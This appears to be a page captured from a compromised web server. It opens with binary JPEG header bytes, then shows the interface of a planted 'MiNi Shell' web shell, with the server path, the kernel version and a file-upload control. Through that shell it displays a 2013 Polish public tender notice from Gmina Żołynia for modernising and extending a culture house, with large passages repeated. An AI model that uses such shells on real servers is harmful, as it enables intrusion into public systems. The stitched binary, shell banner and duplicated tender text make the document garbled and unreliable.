JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131209/266589-N-2013.html

<p class="kh_header"><b>Żołynia: Modernizacja istniejącego Domu Kultury wraz z budową nowego budynku dla działań w sferze kultury w Żołyni</b><br>
<b>Numer ogłoszenia: 266589 - 2013; data zamieszczenia: 09.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żołynia , ul. Rynek 22, 37-110 Żołynia, woj. podkarpackie, tel. 017 2243018, faks 017 2243476.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zolynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja istniejącego Domu Kultury wraz z budową nowego budynku dla działań w sferze kultury w Żołyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania pn. Modernizacja istniejącego Domu Kultury wraz z budową nowego budynku dla działań w sferze kultury w Żołyni
Zakres zamówienia obejmuje: 
Zakres rzeczowy zamówienia obejmuje modernizację Gminnego Ośrodka Kultury i budowę nowego, funkcjonalnego budynku w celu realizacji zadań oraz funkcji kulturalnych i dydaktycznych wykonanych w systemie zaprojektuj i wybuduj.

Modernizowany budynek zlokalizowany jest w Żołyni, przy ulicy Smolarskiej nr 1, na działce nr 6023. Powierzchnia użytkowa budynku wynosi 360 m2. Modernizacja obejmie:
1. Modernizację kotłowni o automatykę sterowania pogodowego optymalizującą zużycie gazu,
2. Wymianę instalacji centralnego ogrzewania z rur stalowych na instalację z rur miedzianych,
3. Wymianę zużytych grzejników żeliwnych na nowe grzejniki konwektorowe,
4. Wymianę okien drewnianych na okna PCV,
5. Wymianę stolarki drzwiowej zewnętrznej i wewnętrznej wg. wymagań do przystosowania dla osób niepełnosprawnych,
6. Ocieplenie budynku płytami styropianowymi z warstwą tynku silikatowego kolorowego,
7. Wymianę zużytych rynien i rur spustowych oraz instalacji odgromowej,
8. Wymianę obróbek blacharskich związanych z ociepleniem ścian,
9. Wymianę zużytych elementów konstrukcyjnych pował i dachu,
10. Ocieplenie więźby dachowej wełną mineralną bądź watą szklaną,
11. Wymiana pokrycia dachu na blachodachówkę,
Pod względem organizacyjnym w zmodernizowanym budynku powstanie punkt informacji kulturalnej i turystycznej oraz muzeum zabawek poświęcone zmarłemu, lokalnemu artyście Stanisławowi Narogowi, którego twórczość charakterystyczna była dla całego regionu.

Zakres rzeczowy zamówienia obejmuje modernizację Gminnego Ośrodka Kultury i budowę nowego, funkcjonalnego budynku w celu realizacji zadań oraz funkcji kulturalnych                        i dydaktycznych. 

Modernizowany budynek zlokalizowany jest w Żołyni, przy ulicy Smolarskiej nr 1, na działce nr 6023. Powierzchnia użytkowa budynku wynosi 360 m2. Modernizacja obejmie:
1. Modernizację kotłowni o automatykę sterowania pogodowego optymalizującą zużycie gazu,
2. Wymianę instalacji centralnego ogrzewania z rur stalowych na instalację z rur miedzianych,
3. Wymianę zużytych grzejników żeliwnych na nowe grzejniki konwektorowe,
4. Wymianę okien drewnianych na okna PCV,
5. Wymianę stolarki drzwiowej zewnętrznej i wewnętrznej wg. wymagań do przystosowania dla osób niepełnosprawnych,
6. Ocieplenie budynku płytami styropianowymi z warstwą tynku silikatowego kolorowego,
7. Wymianę zużytych rynien i rur spustowych oraz instalacji odgromowej,
8. Wymianę obróbek blacharskich związanych z ociepleniem ścian,
9. Wymianę zużytych elementów konstrukcyjnych pował i dachu,
10. Ocieplenie więźby dachowej wełną mineralną bądź watą szklaną,
11. Wymiana pokrycia dachu na blachodachówkę,
Pod względem organizacyjnym w zmodernizowanym budynku powstanie punkt informacji kulturalnej i turystycznej oraz muzeum zabawek poświęcone zmarłemu, lokalnemu artyście Stanisławowi Narogowi, którego twórczość charakterystyczna była dla całego regionu.

Nowopowstały budynek będzie dobudowany do istniejącego budynku i zlokalizowany będzie w Żołyni, przy ulicy Smolarskiej nr 1, na działce nr 6022/7 i 6023 należącej do Gminy Żołynia.
Powierzchnia użytkowa nowego budynku wyniesie około 1925 m2 z jej uzupełnieniem o powierzchnię komunikacyjną pomieszczeń sanitarno-higienicznych i technicznych, związanych z techniczna obsługą funkcjonowania obiektu. Liczba osób jednocześnie
korzystających i przebywających w budynku wyniesie 400. Przy budynku powstanie 5 miejsc parkingowych. W celu spełniania funkcji kulturalnych i artystycznych budynek będzie wyposażony w dodatkowe systemy wspomagające, spełniające różne funkcje pomocnicze, tj.:
- system komputerowy i łączności,
- system okablowania muzycznego (cyfrowy),
- system bezpieczeństwa i monitoringu,
- systemy instalacyjne zapewniające funkcjonowanie obiektu.
Wysokość budynku nie powinna przekraczać 3 kondygnacji, łącznie z poddaszem użytkowym. Wejście będzie zadaszone i będzie posiadać wiatrołap, 

Dach w całości powinien mieć konstrukcję drewnianą z paroizolacją; dopuszczalny jest stropodach do zastosowania na niewielkich powierzchniach bocznych rozbudowanego budynku
W dachu należy przewidzieć zastosowanie  drewnianych okien dachowych uchylnych


Na poszczególnych kondygnacjach całego obiektu będą zlokalizowane następujące pomieszczenia:

1) parter: szatnia, przebieralnia, umywalnia, umywalnia, przebieralnia, korytarz, wiatrołap, magazyn dekoracji, magazyn, klatka schodowa, wiatrołap, korytarz, scena i sala widowiskowa (podstawowa na 360 osób siedzących), pom. gospodarcze, winda, hol, świetlica KGW, szatnia (w holu), pom. gospodarcze, wc, wcx2 (umywalki), wc, wc korytarz, magazyn KGW, pom. techniczne, wiatrołap, podcień wejściowy, pomieszczenie ekspozycji prac (informacja turystyczna), pracownia plastyczna, pracownia fotograficzna
2) piętro: klatka schodowa, magazyn kostiumów scenicznych, pom. obsługi widowisk, pom. biurowe, klatka schodowa, winda, sala nagrań, reżyser dźwięku, pracownia muzyczna, sala prób, korytarz, magazyn, pracownia komputerowa, wc, wc, wc, wc hol, szatnia, szatnia, pokój socjalny, pokój biurowy, gabinet dyrektora, sala wielofunkcyjna (główna), pom. gospodarcze, magazyn
3) poddasze: klatka schodowa, korytarz, pom. techniczne, winda, sala prób, sala prób, magazyn sprzętu muzycznego, sala prób (główna)

Budynek będzie posiadał windę dla osób niepełnosprawnych i będzie przystosowany do korzystania przez osoby niepełnosprawne. Budynek będzie konstrukcji żelbetowej słupowo-płytowej - umożliwi to elastyczną aranżację biur i sal za pomocą ścianek z cegły lub płyt gipsowo-kartonowych. Zastosuje sie więźbę dachową drewnianą oraz elementy ślusarskie i metalowe ze stali nierdzewnej. Klimatyzacja (z uzdatnianiem powietrza) będzie zainstalowana w sali widowiskowo-multimedialnej, scenie wraz z kulisami, pom. obsługi widowisk, sali prób orkiestry dętej II piętro. W pozostałych pomieszczeniach będzie zapewniona wentylacja grawitacyjna oraz 
grawitacyjno-mechaniczna, wykonana z blachy stalowej ocynkowanej i z zainstalowanymi tłumikami i przegrodami przeciwpożarowymi. 
Instalacja gazowa doprowadzona będzie do kotłowni i do pomieszczenia kuchennego (świetlica KGW). Do ogrzewania budynku i przygotowania ciepłej wody użytkowej służyć będzie kocioł grzewczy, opalany gazem, sterowany automatycznie oraz baterie słoneczne. Orurowanie instalacji wodnych i cieplnych wykonane będzie z miedzi, o trwałości użytkowania co najmniej 15 lat. Instalacja kanalizacyjna może być wykonana z rur plastikowych o zapewnionej łatwej dostępności do czyszczaczy i odcinków rewizyjnych. Instalacja elektryczna doprowadzona będzie do każdego pomieszczenia,  dla 15 stanowisk. Oprócz oświetlenia, w każdym pomieszczeniu ma być 4 gniazda wtykowe. Ponadto, w sali widowiskowej, na scenie, sali kameralnej i reżyserce dźwięku, zainstalowane będą gniazda siłowe. Sala widowiskowa, scena, reżyserka i sala nagraniowa, sala prób będą posiadały adaptację akustyczną. Sale prób, reżyserka i kabina nagraniowa będą wyciszone. Budynek będzie bogato wyposażony w instalacje słaboprądowe:
- sieć telefoniczną - wewnętrzna w każdym pomieszczeniu i telefony bezpośrednie w gabinetach i pokojach instruktorskich,
- SSP (detekcyjne czujki przeciwpożarowe - liczba zależna od wielkości pomieszczenia - wraz z instalacją bezpieczeństwa doprowadzoną do pomieszczenia monitoringu budynku,
- sieć komputerowa (ethernet),
- instalacja multimedialna w sali widowiskowej i kameralnej.
- instalacja monitoringu wizyjnego (CCTV)


-  parkingi 
   Powierzchnia miejsc parkingowych wyniesie:  miejsce parkingowe na 4 auta - 41,4 m2  powierzchni oraz miejsce parkingowe na 1 auto dla osoby niepełnosprawnej - 16,2 m2 powierzchni.
- przebudowa kolizji z istniejącymi przyłączami i sieciami wod kan , gaz , kablami Sn, kablami 
  Nn (demontaż, przebudowa  i przełożenie, leży po stronie wykonawcy).
Powierzchnia użytkowa nowego budynku wyniesie około 1925 m2 z jej uzupełnieniem o powierzchnię komunikacyjną pomieszczeń sanitarno-higienicznych i technicznych, związanych z techniczna obsługą funkcjonowania obiektu. Liczba osób jednocześnie
korzystających i przebywających w budynku wyniesie 400. Przy budynku powstanie 5 miejsc parkingowych. W celu spełniania funkcji kulturalnych i artystycznych budynek będzie wyposażony w dodatkowe systemy wspomagające, spełniające różne funkcje pomocnicze, tj.:
- system komputerowy i łączności,
- system okablowania muzycznego (cyfrowy),
- system bezpieczeństwa i monitoringu,
- systemy instalacyjne zapewniające funkcjonowanie obiektu.
Wysokość budynku nie powinna przekraczać 3 kondygnacji, łącznie z poddaszem użytkowym. Wejście będzie zadaszone i będzie posiadać wiatrołap, 

Dach w całości powinien mieć konstrukcję drewnianą z paroizolacją; dopuszczalny jest stropodach do zastosowania na niewielkich powierzchniach bocznych rozbudowanego budynku W dachu należy przewidzieć zastosowanie drewnianych okien dachowych uchylnych

Na poszczególnych kondygnacjach całego obiektu będą zlokalizowane następujące pomieszczenia:
1) parter: szatnia, przebieralnia, umywalnia, umywalnia, przebieralnia, korytarz, wiatrołap, magazyn dekoracji, magazyn, klatka schodowa, wiatrołap, korytarz, scena i sala widowiskowa (podstawowa na 360 osób siedzących), pom. gospodarcze, winda, hol, świetlica KGW, szatnia (w holu), pom. gospodarcze, wc, wcx2 (umywalki), wc, wc korytarz, magazyn KGW, pom. techniczne, wiatrołap, podcień wejściowy, pomieszczenie ekspozycji prac (informacja turystyczna), pracownia plastyczna, pracownia fotograficzna
2) piętro: klatka schodowa, magazyn kostiumów scenicznych, pom. obsługi widowisk, pom. biurowe, klatka schodowa, winda, sala nagrań, reżyser dźwięku, pracownia muzyczna, sala prób, korytarz, magazyn, pracownia komputerowa, wc, wc, wc, wc hol, szatnia, szatnia, pokój socjalny, pokój biurowy, gabinet dyrektora, sala wielofunkcyjna (główna), pom. gospodarcze, magazyn
3) poddasze: klatka schodowa, korytarz, pom. techniczne, winda, sala prób, sala prób, magazyn sprzętu muzycznego, sala prób (główna)

Budynek będzie posiadał windę dla osób niepełnosprawnych i będzie przystosowany do korzystania przez osoby niepełnosprawne. Budynek będzie konstrukcji żelbetowej słupowo-płytowej - umożliwi to elastyczną aranżację biur i sal za pomocą ścianek z cegły lub płyt gipsowo-kartonowych. Zastosuje sie więźbę dachową drewnianą oraz elementy ślusarskie i metalowe ze stali nierdzewnej. Klimatyzacja (z uzdatnianiem powietrza) będzie zainstalowana w sali widowiskowo-multimedialnej, scenie wraz z kulisami, pom. obsługi widowisk, sali prób orkiestry dętej II piętro. W pozostałych pomieszczeniach będzie zapewniona wentylacja grawitacyjna oraz 
grawitacyjno-mechaniczna, wykonana z blachy stalowej ocynkowanej i z zainstalowanymi tłumikami i przegrodami przeciwpożarowymi. 
Instalacja gazowa doprowadzona będzie do kotłowni i do pomieszczenia kuchennego (świetlica KGW). Do ogrzewania budynku i przygotowania ciepłej wody użytkowej służyć będzie kocioł grzewczy, opalany gazem, sterowany automatycznie oraz baterie słoneczne. Orurowanie instalacji wodnych i cieplnych wykonane będzie z miedzi, o trwałości użytkowania co najmniej 15 lat. Instalacja kanalizacyjna może być wykonana z rur plastikowych o zapewnionej łatwej dostępności do czyszczaczy i odcinków rewizyjnych. Instalacja elektryczna doprowadzona będzie do każdego pomieszczenia,  dla 15 stanowisk. Oprócz oświetlenia, w każdym pomieszczeniu ma być 4 gniazda wtykowe. Ponadto, w sali widowiskowej, na scenie, sali kameralnej i reżyserce dźwięku, zainstalowane będą gniazda siłowe. Sala widowiskowa, scena, reżyserka i sala nagraniowa, sala prób będą posiadały adaptację akustyczną. Sale prób, reżyserka i kabina nagraniowa będą wyciszone. Budynek będzie bogato wyposażony w instalacje słaboprądowe:
- sieć telefoniczną - wewnętrzna w każdym pomieszczeniu i telefony bezpośrednie w gabinetach i pokojach instruktorskich,
- SSP (detekcyjne czujki przeciwpożarowe - liczba zależna od wielkości pomieszczenia - wraz z instalacją bezpieczeństwa doprowadzoną do pomieszczenia monitoringu budynku,
- sieć komputerowa (ethernet),
- instalacja multimedialna w sali widowiskowej i kameralnej.
- instalacja monitoringu wizyjnego (CCTV)
-  parkingi 
 Powierzchnia miejsc parkingowych wyniesie:  miejsce parkingowe na 4 auta - 41,4 m2  powierzchni oraz miejsce parkingowe na 1 auto dla osoby niepełnosprawnej - 16,2 m2 powierzchni.
- przebudowa kolizji z istniejącymi przyłączami i sieciami wod kan , gaz , kablami Sn, kablami Nn (demontaż, przebudowa  i przełożenie, leży po stronie wykonawcy).
4.2 Szczegółowy opis zawiera załącznik nr 8 Program funkcjonalno użytkowy.
4.3 Materiały budowlane stosowane do wykonywania przedmiotu zamówienia muszą spełniać wymogi art. 10 ustawy z dnia 7 lipca 1994r. Prawo Budowlane.
4.4 Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego materiały spełniają wymagania określone przez Zamawiającego.
4.5 Z uwagi na prowadzenie robót budowlanych w najbliższym sąsiedztwie domu handlowego i ulicy Smolarskiej Wykonawca zobowiązany jest do apewnienia bezpieczeństwa i prawidłowego zabezpieczenia placu budowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.1 Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 100 000,00 PLN (słownie: sto tysięcy złotych).

10.2 Wadium należy wnieść w jednej lub kilku następujących formach przewidzianych w art. 45 ust. 6 uPzp, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 z późn. zm.).
10.3 Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium w pieniądzu należy przelać na konto Zamawiającego:

BS Żołynia nr 69 9175 0000 2001 0001 6463 0010

10.4 W przypadku wadium wnoszonego w pieniądzu za termin wpłynięcia wadium uznaje się termin jego wniesienia. Przez wniesienie rozumie się uznanie kwoty wadium przez rachunek Zamawiającego. Do oferty należy dołączyć dokument potwierdzający przelew (wniesienie) środków na rachunek Zamawiającego. Wadium wnoszone w pieniądzu powinno znajdować się fizycznie na koncie Zamawiającego przed terminem składania ofert. Nie spełnia tego warunku dołączenie do oferty dowodu przelewu wadium.

10.5 W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu należy złożyć w osobnej kopercie opisanej -  Wadium - Budowa publicznego placu zabaw w Żołyni oraz włożyć do koperty zewnętrznej.
10.6	Wadium wniesione w formie innej niż pieniężna musi spełniać następujące wymagania:
- odpowiadać co do wartości wysokości wadium określonej w niniejszej SIWZ,
- musi odpowiadać co do terminu ważności terminowi związania ofertą określonemu w niniejszej SIWZ,
- zawierać w swej treści okoliczności (zgodnie z art. 46 ust. 4a i 5 uPzp) w których gwarant (poręczyciel) wypłaci kwotę wadium zamawiającemu, wraz z klauzulą mówiącą, że wypłata nastąpi na pierwsze żądanie zamawiającego bez protestu gwaranta (poręczyciela),
10.7 Zamawiający zwróci niezwłocznie wadium na zasadach określonych w art. 46 uPzp.
10.8 Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
 zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe                  
z przyczyn leżących po stronie Wykonawcy.
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 uPzp, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 uPzp lub pełnomocnictw, chyba że udowodni, że nie wynika to z przyczyn nie leżących po jego stronie.
10.9 Wykonawca lub podmiot wystawiający gwarancję bankową ubezpieczeniową nie może uzależnić dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub wykonania czynności (np.: przesłania wezwania za pośrednictwem banku prowadzącego rachunek ), jak również od przedłożenia dodatkowej dokumentacji, dodatkowych oświadczeń złożonych przez wykonawcę lub inny podmiot pod rygorem wykluczenia Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.
Warunek spełniony jeżeli wykonawca załączył poprawnie wypełniony załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.
Warunek spełniony jeżeli wykonawca załączył poprawnie wypełniony załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.
Warunek spełniony jeżeli wykonawca załączył poprawnie wypełniony załącznik nr 2 wraz z dokumentami potwierdzającymi wykonanie: jednej roboty budowlanej o charakterze kubaturowym na kwotę nie mniejszą niż 1 mln zł brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.
Warunek spełniony jeżeli wykonawca załączył poprawnie wypełniony załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.
Warunek spełniony jeżeli wykonawca załączył poprawnie wypełniony załącznik nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany formularz oferty -  (wg załącznika nr 1 do siwz).;
2) Pełnomocnictwo do występowania w imieniu Wykonawcy i zaciągania w jego imieniu zobowiązań. Musi być załączona w oryginale albo załączona jako kopia pełnomocnictwa uwierzytelniona notarialnie (jeśli dotyczy).
3) Informacja o podwykonawcach (jeżeli dotyczy, wg załącznika nr 4 do siwz).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
